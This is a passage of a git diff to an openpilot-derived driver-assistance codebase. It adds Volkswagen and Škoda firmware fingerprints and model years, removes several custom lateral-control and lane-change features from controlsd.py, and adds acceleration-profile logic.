CarInterfaceBase.configure_dp_tune(ret.lateralTuning, ret.latTuneCollection) - ret.autoResumeSng = ret.minEnableSpeed == -1 ret.centerToFront = ret.wheelbase * 0.45 return ret diff --git a/selfdrive/car/volkswagen/values.py b/selfdrive/car/volkswagen/values.py index 59090ffc4..ac8005530 100755 --- a/selfdrive/car/volkswagen/values.py +++ b/selfdrive/car/volkswagen/values.py @@ -189,9 +189,9 @@ class VWCarInfo(CarInfo): CAR_INFO: Dict[str, Union[VWCarInfo, List[VWCarInfo]]] = { CAR.ARTEON_MK1: [ - VWCarInfo("Volkswagen Arteon 2018-22", video_link="https://youtu.be/FAomFKPFlDA"), - VWCarInfo("Volkswagen Arteon R 2020-22", video_link="https://youtu.be/FAomFKPFlDA"), - VWCarInfo("Volkswagen Arteon eHybrid 2020-22", video_link="https://youtu.be/FAomFKPFlDA"), + VWCarInfo("Volkswagen Arteon 2018-23", video_link="https://youtu.be/FAomFKPFlDA"), + VWCarInfo("Volkswagen Arteon R 2020-23", video_link="https://youtu.be/FAomFKPFlDA"), + VWCarInfo("Volkswagen Arteon eHybrid 2020-23", video_link="https://youtu.be/FAomFKPFlDA"), VWCarInfo("Volkswagen CC 2018-22", video_link="https://youtu.be/FAomFKPFlDA"), ], CAR.ATLAS_MK1: [ @@ -262,7 +262,7 @@ CAR_INFO: Dict[str, Union[VWCarInfo, List[VWCarInfo]]] = { CAR.SKODA_KAMIQ_MK1: VWCarInfo("Škoda Kamiq 2021", footnotes=[Footnote.VW_MQB_A0, Footnote.KAMIQ]), CAR.SKODA_KAROQ_MK1: VWCarInfo("Škoda Karoq 2019-21"), CAR.SKODA_KODIAQ_MK1: VWCarInfo("Škoda Kodiaq 2017-23"), - CAR.SKODA_SCALA_MK1: VWCarInfo("Škoda Scala 2020", footnotes=[Footnote.VW_MQB_A0]), + CAR.SKODA_SCALA_MK1: VWCarInfo("Škoda Scala 2020-23", footnotes=[Footnote.VW_MQB_A0]), CAR.SKODA_SUPERB_MK3: VWCarInfo("Škoda Superb 2015-22"), CAR.SKODA_OCTAVIA_MK3: [ VWCarInfo("Škoda Octavia 2015, 2018-19"), @@ -307,6 +307,7 @@ FW_QUERY_CONFIG = FwQueryConfig( FW_VERSIONS = { CAR.ARTEON_MK1: { (Ecu.engine, 0x7e0, None): [ + b'\xf1\x873G0906259AH\xf1\x890001', b'\xf1\x873G0906259F \xf1\x890004', b'\xf1\x873G0906259G \xf1\x890004', b'\xf1\x873G0906259G \xf1\x890005', @@ -320,6 +321,7 @@ FW_VERSIONS = { b'\xf1\x870DL300014C \xf1\x893704', b'\xf1\x870GC300011L \xf1\x891401', b'\xf1\x870GC300014M \xf1\x892802', + b'\xf1\x870GC300019G \xf1\x892804', b'\xf1\x870GC300040P \xf1\x891401', ], (Ecu.srs, 0x715, None): [ @@ -327,7 +329,7 @@ FW_VERSIONS = { b'\xf1\x873Q0959655BK\xf1\x890703\xf1\x82\x0e1616001613121177161113772900', b'\xf1\x873Q0959655CK\xf1\x890711\xf1\x82\x0e1712141712141105121122052900', b'\xf1\x873Q0959655DA\xf1\x890720\xf1\x82\x0e1712141712141105121122052900', - b'\xf1\x873Q0959655DL\xf1\x890732\xf1\x82\0161812141812171105141123052J00', + b'\xf1\x873Q0959655DL\xf1\x890732\xf1\x82\x0e1812141812171105141123052J00', b'\xf1\x875QF959655AP\xf1\x890755\xf1\x82\x1311110011111311111100110200--1611125F49', ], (Ecu.eps, 0x712, None): [ @@ -336,6 +338,7 @@ FW_VERSIONS = { b'\xf1\x875Q0910143C \xf1\x892211\xf1\x82\x0567B0020800', b'\xf1\x875WA907145M \xf1\x891051\xf1\x82\x002MB4092M7N', b'\xf1\x875WA907145M \xf1\x891051\xf1\x82\x002NB4202N7N', + b'\xf1\x875WA907145Q \xf1\x891063\xf1\x82\x002KB4092KOM', ], (Ecu.fwdRadar, 0x757, None): [ b'\xf1\x872Q0907572AA\xf1\x890396', @@ -358,11 +361,13 @@ FW_VERSIONS = { b'\xf1\x8703H906026S \xf1\x896693', b'\xf1\x8703H906026S \xf1\x899970', b'\xf1\x873CN906259 \xf1\x890005', + b'\xf1\x873CN906259F \xf1\x890002', ], (Ecu.transmission, 0x7e1, None): [ b'\xf1\x8709G927158A \xf1\x893387', b'\xf1\x8709G927158DR\xf1\x893536', b'\xf1\x8709G927158DR\xf1\x893742', + b'\xf1\x8709G927158EN\xf1\x893691', b'\xf1\x8709G927158F \xf1\x893489', b'\xf1\x8709G927158FT\xf1\x893835', b'\xf1\x8709G927158GL\xf1\x893939', @@ -392,17 +397,21 @@ FW_VERSIONS = { CAR.CRAFTER_MK2: { (Ecu.engine, 0x7e0, None): [ b'\xf1\x8704L906056EK\xf1\x896391', + b'\xf1\x8705L906023BC\xf1\x892688', ], # Only current upstreamed vehicle has a manual transmission #(Ecu.transmission, 0x7e1, None): [ #], (Ecu.srs, 0x715, None): [ b'\xf1\x873Q0959655BG\xf1\x890703\xf1\x82\x0e16120016130012051G1313052900', + b'\xf1\x875QF959655AS\xf1\x890755\xf1\x82\x1315140015150011111100050200--1311120749', ], (Ecu.eps, 0x712, None): [ b'\xf1\x872N0909143E \xf1\x897021\xf1\x82\x05163AZ306A2', + b'\xf1\x872N0909144K \xf1\x897045\xf1\x82\x05233AZ810A2', ], (Ecu.fwdRadar, 0x757, None): [ + b'\xf1\x872Q0907572AA\xf1\x890396', b'\xf1\x872Q0907572M \xf1\x890233', ], }, @@ -488,6 +497,7 @@ FW_VERSIONS = { b'\xf1\x870D9300041P \xf1\x894507', b'\xf1\x870DD300045K \xf1\x891120', b'\xf1\x870DD300046F \xf1\x891601', + b'\xf1\x870GC300012A \xf1\x891401', b'\xf1\x870GC300012A \xf1\x891403', b'\xf1\x870GC300014B \xf1\x892401', b'\xf1\x870GC300014B \xf1\x892405', @@ -504,6 +514,7 @@ FW_VERSIONS = { b'\xf1\x875Q0959655AA\xf1\x890388\xf1\x82\x111413001113120043114417121411149113', b'\xf1\x875Q0959655AA\xf1\x890388\xf1\x82\x111413001113120053114317121C111C9113', b'\xf1\x875Q0959655AR\xf1\x890317\xf1\x82\x13141500111233003142114A2131219333313100', + b'\xf1\x875Q0959655BH\xf1\x890336\xf1\x82\x1314160011123300314211012230229333423100', b'\xf1\x875Q0959655BH\xf1\x890336\xf1\x82\x1314160011123300314211012230229333463100', b'\xf1\x875Q0959655BS\xf1\x890403\xf1\x82\x1314160011123300314240012250229333463100', b'\xf1\x875Q0959655BT\xf1\x890403\xf1\x82\x13141600111233003142404A2251229333463100', @@ -577,6 +588,7 @@ FW_VERSIONS = { b'\xf1\x875Q0907572F \xf1\x890400\xf1\x82\x0101', b'\xf1\x875Q0907572G \xf1\x890571', b'\xf1\x875Q0907572H \xf1\x890620', + b'\xf1\x875Q0907572J \xf1\x890653', b'\xf1\x875Q0907572J \xf1\x890654', b'\xf1\x875Q0907572P \xf1\x890682', b'\xf1\x875Q0907572R \xf1\x890771', @@ -1270,19 +1282,24 @@ FW_VERSIONS = { CAR.SKODA_SCALA_MK1: { (Ecu.engine, 0x7e0, None): [ b'\xf1\x8704C906025AK\xf1\x897053', + b'\xf1\x8705C906032M \xf1\x892365', ], (Ecu.transmission, 0x7e1, None): [ + b'\xf1\x870CW300020 \xf1\x891907', b'\xf1\x870CW300050 \xf1\x891709', ], (Ecu.srs, 0x715, None): [ b'\xf1\x872Q0959655AJ\xf1\x890250\xf1\x82\x1211110411110411--04040404131111112H14', b'\xf1\x872Q0959655AM\xf1\x890351\xf1\x82\022111104111104112104040404111111112H14', + b'\xf1\x872Q0959655AS\xf1\x890411\xf1\x82\x1311150411110411210404040417151215391413', ], (Ecu.eps, 0x712, None): [ b'\xf1\x872Q1909144M \xf1\x896041', + b'\xf1\x872Q1909144AB\xf1\x896050', ], (Ecu.fwdRadar, 0x757, None): [ b'\xf1\x872Q0907572R \xf1\x890372', + b'\xf1\x872Q0907572AA\xf1\x890396', ], }, CAR.SKODA_SUPERB_MK3: { diff --git a/selfdrive/controls/controlsd.py b/selfdrive/controls/controlsd.py index 8524c4bcf..7f06f72e6 100755 --- a/selfdrive/controls/controlsd.py +++ b/selfdrive/controls/controlsd.py @@ -7,7 +7,7 @@ from cereal import car, log from common.numpy_fast import clip from common.realtime import sec_since_boot, config_realtime_process, Priority, Ratekeeper, DT_CTRL from common.profiler import Profiler -from common.params import Params, put_nonblocking +from common.params import Params, put_nonblocking, put_bool_nonblocking import cereal.messaging as messaging from cereal.visionipc import VisionIpcClient, VisionStreamType from common.conversions import Conversions as CV @@ -17,13 +17,12 @@ from system.version import is_release_branch, get_short_branch from selfdrive.boardd.boardd import can_list_to_can_capnp from selfdrive.car.car_helpers import get_car, get_startup_event, get_one_can from selfdrive.controls.lib.lateral_planner import CAMERA_OFFSET -from selfdrive.controls.lib.drive_helpers import VCruiseHelper, get_lag_adjusted_curvature, V_CRUISE_UNSET +from selfdrive.controls.lib.drive_helpers import VCruiseHelper, get_lag_adjusted_curvature from selfdrive.controls.lib.latcontrol import LatControl, MIN_LATERAL_CONTROL_SPEED from selfdrive.controls.lib.longcontrol import LongControl from selfdrive.controls.lib.latcontrol_pid import LatControlPID from selfdrive.controls.lib.latcontrol_angle import LatControlAngle, STEER_ANGLE_SATURATION_THRESHOLD from selfdrive.controls.lib.latcontrol_torque import LatControlTorque -from selfdrive.controls.lib.latcontrol_lqr import LatControlLQR from selfdrive.controls.lib.events import Events, ET from selfdrive.controls.lib.alertmanager import AlertManager, set_offroad_alert from selfdrive.controls.lib.vehicle_model import VehicleModel @@ -37,7 +36,7 @@ REPLAY = "REPLAY" in os.environ SIMULATION = "SIMULATION" in os.environ TESTING_CLOSET = "TESTING_CLOSET" in os.environ NOSENSOR = "NOSENSOR" in os.environ -IGNORE_PROCESSES = {"loggerd", "encoderd", "statsd", "mapd", "gpxd", "gpxd_uploader"} +IGNORE_PROCESSES = {"loggerd", "encoderd", "statsd", "mapd", "otisserv", "fileserv"} ThermalStatus = log.DeviceState.ThermalStatus State = log.ControlsState.OpenpilotState @@ -63,14 +62,6 @@ class Controls: # Ensure the current branch is cached, otherwise the first iteration of controlsd lags self.branch = get_short_branch("") - # dp - self.params = Params() - self.dp_jetson = self.params.get_bool('dp_jetson') - try: - self.dp_lat_version = int(self.params.get('dp_lateral_version').decode('utf8')) - except: - self.dp_lat_version = 0 - # Setup sockets self.pm = pm if self.pm is None: @@ -78,8 +69,6 @@ class Controls: 'carControl', 'carEvents', 'carParams']) self.camera_packets = ["roadCameraState", "driverCameraState", "wideRoadCameraState"] - if self.dp_jetson: - self.camera_packets = ["roadCameraState", "wideRoadCameraState"] self.can_sock = can_sock if can_sock is None: @@ -88,18 +77,18 @@ class Controls: self.log_sock = messaging.sub_sock('androidLog') - # self.params = Params() + self.params = Params() + self.dp_alka = self.params.get_bool("dp_alka") + self.dp_device_disable_temp_check = self.params.get_bool("dp_device_disable_temp_check") self.sm = sm if self.sm is None: ignore = ['testJoystick'] if SIMULATION: ignore += ['driverCameraState', 'managerState'] - if self.dp_jetson: - ignore += ['driverCameraState', 'driverMonitoringState'] self.sm = messaging.SubMaster(['deviceState', 'pandaStates', 'peripheralState', 'modelV2', 'liveCalibration', 'driverMonitoringState', 'longitudinalPlan', 'lateralPlan', 'liveLocationKalman', - 'managerState', 'liveParameters', 'radarState', 'liveTorqueParameters', 'testJoystick', 'dragonConf'] + self.camera_packets, - ignore_alive=ignore, ignore_avg_freq=['radarState', 'testJoystick', 'longitudinalPlan', 'dragonConf']) + 'managerState', 'liveParameters', 'radarState', 'liveTorqueParameters', 'testJoystick'] + self.camera_packets, + ignore_alive=ignore, ignore_avg_freq=['radarState', 'testJoystick']) if CI is None: # wait for one pandaState and one CAN packet @@ -120,22 +109,8 @@ class Controls: if not self.disengage_on_accelerator: self.CP.alternativeExperience |= ALTERNATIVE_EXPERIENCE.DISABLE_DISENGAGE_ON_GAS - # dp - self.sm['dragonConf'].dpAtl = int(self.params.get('dp_atl', encoding='utf8')) - if self.sm['dragonConf'].dpAtl: + if self.dp_alka: self.CP.alternativeExperience |= ALTERNATIVE_EXPERIENCE.ALKA - self.dp_temp_check = self.params.get_bool('dp_temp_check') - self.dp_lateral_road_edge_detected = False - # alt lat ctrl - self.sm['dragonConf'].dpLateralAlt = False - self.sm['dragonConf'].dpLateralAltCtrl = 0 - self.sm['dragonConf'].dpLateralAltSpeed = 80 - self.dp_lateral_alt_v_cruise_kph = 0 - self.dp_lateral_alt_v_cruise_kph_prev = 0 - self.dp_lateral_alt_active = False - self.local_trip_min_total = float(self.params.get("local_trip_min_total", encoding='utf8')) - self.local_trip_meter_total = float(self.params.get("local_trip_meter_total", encoding='utf8')) - self.local_trip_count_added = False # read params self.is_metric = self.params.get_bool("IsMetric") @@ -182,11 +157,6 @@ class Controls: self.LaC = LatControlPID(self.CP, self.CI) elif self.CP.lateralTuning.which() == 'torque': self.LaC = LatControlTorque(self.CP, self.CI) - elif self.CP.lateralTuning.which() == 'lqr': - self.LaC = LatControlLQR(self.CP, self.CI) - - # dp, keep the original LaC for alt lac ctrl - self.LaC_default = self.LaC self.initialized = False self.state = State.disabled @@ -237,49 +207,12 @@ class Controls: self.rk = Ratekeeper(100, print_delay_threshold=None) self.prof = Profiler(False) # off by default - def dp_update_lat_controller(self): - if self.sm['dragonConf'].dpLateralAlt: - self.dp_lateral_alt_v_cruise_kph = self.v_cruise_helper.v_cruise_kph - # when cruise set speed changed - if self.dp_lateral_alt_v_cruise_kph != self.dp_lateral_alt_v_cruise_kph_prev: - # when set speed below config speed or set speed equal unset speed, fallback to default - if self.dp_lateral_alt_v_cruise_kph == V_CRUISE_UNSET or self.dp_lateral_alt_v_cruise_kph < self.sm['dragonConf'].dpLateralAltSpeed: - self.dp_lateral_alt_active = False - if type(self.LaC) != type(self.LaC_default): - # set lateralTuning back - if isinstance(self.LaC_default, LatControlPID): - self.CP.lateralTuning.pid = self.CP.latTuneCollection.pid - elif isinstance(self.LaC_default, LatControlLQR): - self.CP.lateralTuning.lqr = self.CP.latTuneCollection.lqr - elif isinstance(self.LaC_default, LatControlTorque): - self.CP.lateralTuning.torque = self.CP.latTuneCollection.torque - # set LaC back - self.LaC = self.LaC_default - self.LaC.reset() - # when set speed >= config speed - else: - # save current status - if type(self.LaC) == type(self.LaC_default): - self.LaC_default = self.LaC - self.dp_lateral_alt_active = True - if getattr(self.CP.latTuneCollection.pid, 'kpV') and self.sm['dragonConf'].dpLateralAltCtrl == 1 and not isinstance(self.LaC, LatControlPID): - self.CP.lateralTuning.pid = self.CP.latTuneCollection.pid - self.LaC = LatControlPID(self.CP, self.CI) - elif self.sm['dragonConf'].dpLateralAltCtrl == 2 and not isinstance(self.LaC, LatControlLQR): - self.CP.lateralTuning.lqr = self.CP.latTuneCollection.lqr - self.LaC = LatControlLQR(self.CP, self.CI) - elif self.sm['dragonConf'].dpLateralAltCtrl == 3 and not isinstance(self.LaC, LatControlTorque): - self.CP.lateralTuning.torque = self.CP.latTuneCollection.torque - self.LaC = LatControlTorque(self.CP, self.CI) - self.LaC.reset() - self.dp_lateral_alt_v_cruise_kph_prev = self.dp_lateral_alt_v_cruise_kph - def set_initial_state(self): if REPLAY: controls_state = Params().get("ReplayControlsState") if controls_state is not None: - controls_state = log.ControlsState.from_bytes(controls_state) - self.v_cruise_helper.v_cruise_kph = controls_state.vCruise + with log.ControlsState.from_bytes(controls_state) as controls_state: + self.v_cruise_helper.v_cruise_kph = controls_state.vCruise if any(ps.controlsAllowed for ps in self.sm['pandaStates']): self.state = State.enabled @@ -320,16 +253,15 @@ class Controls: if CS.gasPressed: self.events.add(EventName.gasPressedOverride) - if not self.CP.notCar and not self.dp_jetson: + if not self.CP.notCar: self.events.add_from_msg(self.sm['driverMonitoringState'].events) - self.events.add_from_msg(self.sm['longitudinalPlan'].eventsDEPRECATED) # Add car events, ignore if CAN isn't valid if CS.canValid: self.events.add_from_msg(CS.events) # Create events for temperature, disk space, and memory - if self.dp_temp_check and self.sm['deviceState'].thermalStatus >= ThermalStatus.red: + if not self.dp_device_disable_temp_check and self.sm['deviceState'].thermalStatus >= ThermalStatus.red: self.events.add(EventName.overheat) if self.sm['deviceState'].freeSpacePercent < 7 and not SIMULATION: # under 7% of space free no enable allowed @@ -363,28 +295,13 @@ class Controls: self.events.add(EventName.calibrationRecalibrating) else: self.events.add(EventName.calibrationInvalid) - direction = self.sm['lateralPlan'].laneChangeDirection + # Handle lane change if self.sm['lateralPlan'].laneChangeState == LaneChangeState.preLaneChange: - self.dp_lateral_road_edge_detected = self.sm['dragonConf'].dpLateralRoadEdgeDetected - #dp - moved it up L364 - #direction = self.sm['lateralPlan'].laneChangeDirection + direction = self.sm['lateralPlan'].laneChangeDirection if (CS.leftBlindspot and direction == LaneChangeDirection.left) or \ (CS.rightBlindspot and direction == LaneChangeDirection.right): self.events.add(EventName.laneChangeBlocked) - #dp - elif self.dp_lateral_road_edge_detected: - md = self.sm['modelV2'] - left_road_edge = -md.roadEdges[0].y[0] - right_road_edge = md.roadEdges[1].y[0] - if (((left_road_edge < 3.5) and direction == LaneChangeDirection.left) or \ - ((right_road_edge < 3.5) and direction == LaneChangeDirection.right)): - self.events.add(EventName.laneChangeBlocked) - else: - if direction == LaneChangeDirection.left: - self.events.add(EventName.preLaneChangeLeft) - else: - self.events.add(EventName.preLaneChangeRight) else: if direction == LaneChangeDirection.left: self.events.add(EventName.preLaneChangeLeft) @@ -392,11 +309,7 @@ class Controls: self.events.add(EventName.preLaneChangeRight) elif self.sm['lateralPlan'].laneChangeState in (LaneChangeState.laneChangeStarting, LaneChangeState.laneChangeFinishing): - if (CS.leftBlindspot and direction == LaneChangeDirection.left) or \ - (CS.rightBlindspot and direction == LaneChangeDirection.right): - self.events.add(EventName.laneChangeBlocked) - else: - self.events.add(EventName.laneChange) + self.events.add(EventName.laneChange) for i, pandaState in enumerate(self.sm['pandaStates']): # All pandas must match the list of safetyConfigs, and if outside this list, must be silent or noOutput @@ -465,7 +378,7 @@ class Controls: else: self.logged_comm_issue = None - if not self.sm['liveParameters'].valid and not TESTING_CLOSET and not SIMULATION: + if not self.sm['liveParameters'].valid and not TESTING_CLOSET and (not SIMULATION or REPLAY): self.events.add(EventName.vehicleModelInvalid) if not self.sm['lateralPlan'].mpcSolutionValid: self.events.add(EventName.plannerError) @@ -503,7 +416,7 @@ class Controls: pass # TODO: fix simulator - if not SIMULATION: + if not SIMULATION or REPLAY: if not NOSENSOR: if not self.sm['liveLocationKalman'].gpsOK and self.sm['liveLocationKalman'].inputsOK and (self.distance_traveled > 1000): # Not show in first 1 km to allow for driving out of garage. This event shows after 5 minutes @@ -519,7 +432,7 @@ class Controls: # Update carState from CAN can_strs = messaging.drain_sock_raw(self.can_sock, wait_for_one=True) - CS = self.CI.update(self.CC, can_strs, self.sm['dragonConf']) + CS = self.CI.update(self.CC, can_strs) if len(can_strs) and REPLAY: self.can_log_mono_time = messaging.log_from_bytes(can_strs[0]).logMonoTime @@ -528,7 +441,7 @@ class Controls: if not self.initialized: all_valid = CS.canValid and self.sm.all_checks() timed_out = self.sm.frame * DT_CTRL > (6. if REPLAY else 3.5) - if all_valid or timed_out or SIMULATION: + if all_valid or timed_out or (SIMULATION and not REPLAY): available_streams = VisionIpcClient.available_streams("camerad", block=False) if VisionStreamType.VISION_STREAM_ROAD not in available_streams: self.sm.ignore_alive.append('roadCameraState') @@ -540,7 +453,7 @@ class Controls: self.initialized = True self.set_initial_state() - Params().put_bool("ControlsReady", True) + put_bool_nonblocking("ControlsReady", True) # Check for CAN timeout if not can_strs: @@ -562,26 +475,13 @@ class Controls: self.mismatch_counter += 1 self.distance_traveled += CS.vEgo * DT_CTRL - # dp - local trip log - self.local_trip_meter_total += CS.vEgo * DT_CTRL - if not self.local_trip_count_added: - if self.local_trip_meter_total > 0: - put_nonblocking("local_trip_count_total", str(float(self.params.get("local_trip_count_total").decode('utf-8')) + 1)) - self.local_trip_count_added = True - # every 30 secs - if self.local_trip_count_added and self.sm.frame % int(30. / DT_CTRL) == 0: - put_nonblocking("local_trip_meter_total", str(round(self.local_trip_meter_total, 2))) - put_nonblocking("local_trip_min_total", str(self.local_trip_min_total + 0.5)) return CS def state_transition(self, CS): """Compute conditional state transitions and execute actions on state transitions""" - # dp - toyota speed override here - # dp - @todo may apply to other makes in the future? - dp_override_speed = self.sm['dragonConf'].dpToyotaCruiseOverrideSpeed if self.sm['dragonConf'].dpToyotaCruiseOverride else False - self.v_cruise_helper.update_v_cruise(CS, self.enabled, self.is_metric, dp_override_speed) + self.v_cruise_helper.update_v_cruise(CS, self.enabled, self.is_metric) # decrement the soft disable timer at every step, as it's reset on # entrance in SOFT_DISABLING state @@ -673,7 +573,6 @@ class Controls: sr = max(lp.steerRatio, 0.1) self.VM.update_params(x, sr) - self.dp_update_lat_controller() # Update Torque Params if self.CP.lateralTuning.which() == 'torque': torque_params = self.sm['liveTorqueParameters'] @@ -686,20 +585,16 @@ class Controls: CC = car.CarControl.new_message() CC.enabled = self.enabled - # dp - keep the current lat controller type - CC.latController = self.CP.lateralTuning.which() # Check which actuators can be enabled standstill = CS.vEgo <= max(self.CP.minSteerSpeed, MIN_LATERAL_CONTROL_SPEED) or CS.standstill CC.latActive = self.active and not CS.steerFaultTemporary and not CS.steerFaultPermanent and \ (not standstill or self.joystick_mode) CC.longActive = self.enabled and not self.events.any(ET.OVERRIDE_LONGITUDINAL) and self.CP.openpilotLongitudinalControl - if not standstill and CS.cruiseState.available and self.sm['dragonConf'].dpAtl > 0: + if self.dp_alka and not standstill and CS.cruiseState.available: if self.sm['liveCalibration'].calStatus != log.LiveCalibrationData.Status.calibrated: pass - elif CS.steerFaultTemporary: - pass - elif CS.steerFaultPermanent: + elif CS.steerFaultTemporary or CS.steerFaultPermanent: pass elif CS.gearShifter == car.CarState.GearShifter.reverse: pass @@ -716,18 +611,7 @@ class Controls: if CS.leftBlinker or CS.rightBlinker: self.last_blinker_frame = self.sm.frame - # dp - manual lane change - if self.sm['dragonConf'].dpLateralLcManual: - speed = CS.vEgo * CV.MS_TO_MPH - if self.sm['dragonConf'].dpLateralMode == 1 and speed >= self.sm['dragonConf'].dpLcMinMph: - pass - # we use "or" here in case dpLcAutoMinMph is smaller than dpLcMinMph - elif self.sm['dragonConf'].dpLateralMode == 2 and (speed >= self.sm['dragonConf'].dpLcMinMph or speed >= self.sm['dragonConf'].dpLcAutoMinMph): - pass - else: - if CC.latActive: - self.events.add(EventName.manualSteeringRequiredBlinkersOn) - CC.latActive = False + # State specific actions if not CC.latActive: @@ -745,7 +629,7 @@ class Controls: self.desired_curvature, self.desired_curvature_rate = get_lag_adjusted_curvature(self.CP, CS.vEgo, lat_plan.psis, lat_plan.curvatures, - lat_plan.curvatureRates, self.dp_lat_version) + lat_plan.curvatureRates) actuators.steer, actuators.steeringAngleDeg, lac_log = self.LaC.update(CC.latActive, CS, self.VM, lp, self.last_actuators, self.steer_limited, self.desired_curvature, self.desired_curvature_rate, self.sm['liveLocationKalman']) @@ -771,7 +655,7 @@ class Controls: recent_steer_pressed = (self.sm.frame - self.last_steering_pressed_frame)*DT_CTRL < 2.0 # Send a "steering required alert" if saturation count has reached the limit - if lac_log.active and not recent_steer_pressed: + if lac_log.active and not recent_steer_pressed and not self.CP.notCar: if self.CP.lateralTuning.which() == 'torque' and not self.joystick_mode: undershooting = abs(lac_log.desiredLateralAccel) / abs(1e-3 + lac_log.actualLateralAccel) > 1.2 turning = abs(lac_log.desiredLateralAccel) > 1.0 @@ -930,8 +814,6 @@ class Controls: lat_tuning = self.CP.lateralTuning.which() if self.joystick_mode: controlsState.lateralControlState.debugState = lac_log - elif lat_tuning == 'lqr': - controlsState.lateralControlState.lqrState = lac_log elif self.CP.steerControlType == car.CarParams.SteerControlType.angle: controlsState.lateralControlState.angleState = lac_log elif lat_tuning == 'pid': @@ -941,7 +823,6 @@ class Controls: elif lat_tuning == 'indi': controlsState.lateralControlState.indiState = lac_log - controlsState.dpLateralAltActive = self.dp_lateral_alt_active self.pm.send('controlsState', dat) # carState @@ -979,11 +860,7 @@ class Controls: self.prof.checkpoint("Ratekeeper", ignore=True) self.is_metric = self.params.get_bool("IsMetric") - if self.CP.openpilotLongitudinalControl: - if self.sm['dragonConf'].dpE2EConditional: - self.experimental_mode = self.sm['longitudinalPlan'].dpE2EIsBlended - else: - self.experimental_mode = self.params.get_bool("ExperimentalMode") + self.experimental_mode = self.params.get_bool("ExperimentalMode") and self.CP.openpilotLongitudinalControl # Sample data from sockets and get a carState CS = self.data_sample() diff --git a/selfdrive/controls/lib/accel_controller.py b/selfdrive/controls/lib/accel_controller.py new file mode 100644 index 000000000..cf58f0ab7 --- /dev/null +++ b/selfdrive/controls/lib/accel_controller.py @@ -0,0 +1,48 @@ +from common.numpy_fast import interp +from common.params import Params + +DP_ACCEL_STOCK = 0 +DP_ACCEL_ECO = 1 +DP_ACCEL_NORMAL = 2 +DP_ACCEL_SPORT = 3 + +# accel profile by @arne182 modified by cgw +_DP_CRUISE_MIN_V = [-0.765, -0.765, -0.80, -0.80, -0.75, -0.70] +_DP_CRUISE_MIN_V_ECO = [-0.760, -0.760, -0.76, -0.76, -0.70, -0.65] +_DP_CRUISE_MIN_V_SPORT = [-0.770, -0.770, -0.90, -1.00, -0.90, -0.80] +_DP_CRUISE_MIN_BP = [0., 15.66, 17.88, 20., 30., 55.] +#DP_CRUISE_MIN_BP in mph=[0., 18, 35, 40, 45, 67, 123] + +_DP_CRUISE_MAX_V = [3.4, 2.8, 1.8, 1.4, 1.06, .88, .68, .46, .35, .13] +_DP_CRUISE_MAX_V_ECO = [3.2, 2.6, 1.6, 1.2, .76, .62, .48, .36, .28, .09] +_DP_CRUISE_MAX_V_SPORT = [3.5, 3.0, 2.4, 2.9, 2.1, 1.7, 1.3, .9, .7, .5] +_DP_CRUISE_MAX_BP = [0., 3, 6., 8., 11., 15., 20., 25., 30., 55.] +#DP_CRUISE_MAX_BP in mph=[0., 6.7, 13, 18, 25, 33, 45, 56, 67, 123] + + +class AccelController: + + def __init__(self): + self._params = Params() + self._dp_long_accel_profile = DP_ACCEL_STOCK + + def read_params(self): + try: + self._dp_long_accel_profile = int(self._params.get("dp_long_accel_profile", encoding='utf-8')) + except (KeyError, TypeError, ValueError): + self._dp_long_accel_profile = DP_ACCEL_STOCK + + def _dp_calc_cruise_accel_limits(self, v_ego): + if self._dp_long_accel_profile == DP_ACCEL_ECO: + a_cruise_min = interp(v_ego, _DP_CRUISE_MIN_BP, _DP_CRUISE_MIN_V_ECO) + a_cruise_max = interp(v_ego, _DP_CRUISE_MAX_BP, _DP_CRUISE_MAX_V_ECO) + elif self._dp_long_accel_profile == DP_ACCEL_SPORT: + a_cruise_min = interp(v_ego, _DP_CRUISE_MIN_BP, _DP_CRUISE_MIN_V_SPORT) + a_cruise_max = interp(v_ego, _DP_CRUISE_MAX_BP, _DP_CRUISE_MAX_V_SPORT) + else: + a_cruise_min = interp(v_ego, _DP_CRUISE_MIN_BP, _DP_CRUISE_MIN_V) + a_cruise_max = interp(v_ego, _DP_CRUISE_MAX_BP, _DP_CRUISE_MAX_V) + return a_cruise_min, a_cruise_max + + def get_accel_limits(self, v_ego, accel_limits): + return accel_limits if self._dp_long_accel_profile == DP_ACCEL_STOCK else self._dp_calc_cruise_accel_limits(v_ego) diff --git a/selfdrive/controls/lib/desire_helper.py b/selfdrive/controls/lib/desire_helper.py index 344c5b0f3..4652b41c1 100644 --- a/selfdrive/controls/lib/desire_helper.py +++ b/selfdrive/controls/lib/desire_helper.py @@ -1,6 +1,6 @@ from cereal import log from common.conversions import Conversions as CV -from common.realtime import DT_MDL, sec_since_boot +from common.realtime import DT_MDL LaneChangeState = log.LateralPlan.LaneChangeState LaneChangeDirection = log.LateralPlan.LaneChangeDirection @@ -40,43 +40,20 @@ class DesireHelper: self.prev_one_blinker = False self.desire = log.LateralPlan.Desire.none - # dp - self.dp_lc_auto_done = False - self.dp_lc_auto_delay_start_sec = None - self.dp_lateral_mode = 1 # 0 = blinker mode (should we remove?), 1 = assist lane change, 2 = auto lane change - self.dp_lc_min_mph = LANE_CHANGE_SPEED_MIN - self.dp_lc_auto_min_mph = LANE_CHANGE_SPEED_MIN + 10 - self.dp_lc_auto_delay = 3 # secs - self.dp_lateral_road_edge_detected = False - - def update(self, carstate, lateral_active, lane_change_prob, dragonconf, md): - # dp - sync with dragonConf - self.dp_lateral_mode = dragonconf.dpLateralMode - self.dp_lc_min_mph = dragonconf.dpLcMinMph * CV.MPH_TO_MS - self.dp_lc_auto_min_mph = dragonconf.dpLcAutoMinMph * CV.MPH_TO_MS - self.dp_lc_auto_min_mph = self.dp_lc_min_mph if self.dp_lc_auto_min_mph < self.dp_lc_min_mph else self.dp_lc_auto_min_mph - self.dp_lc_auto_delay = dragonconf.dpLcAutoDelay - self.dp_lateral_road_edge_detected = dragonconf.dpLateralRoadEdgeDetected - + def update(self, carstate, lateral_active, lane_change_prob): v_ego = carstate.vEgo one_blinker = carstate.leftBlinker != carstate.rightBlinker - below_lane_change_speed = v_ego < self.dp_lc_min_mph - below_alc_speed = v_ego < self.dp_lc_auto_min_mph + below_lane_change_speed = v_ego < LANE_CHANGE_SPEED_MIN if not lateral_active or self.lane_change_timer > LANE_CHANGE_TIME_MAX: self.lane_change_state = LaneChangeState.off self.lane_change_direction = LaneChangeDirection.none else: - blindspot_detected = ((carstate.leftBlindspot and self.lane_change_direction == LaneChangeDirection.left) or - (carstate.rightBlindspot and self.lane_change_direction == LaneChangeDirection.right)) # LaneChangeState.off if self.lane_change_state == LaneChangeState.off and one_blinker and not self.prev_one_blinker and not below_lane_change_speed: self.lane_change_state = 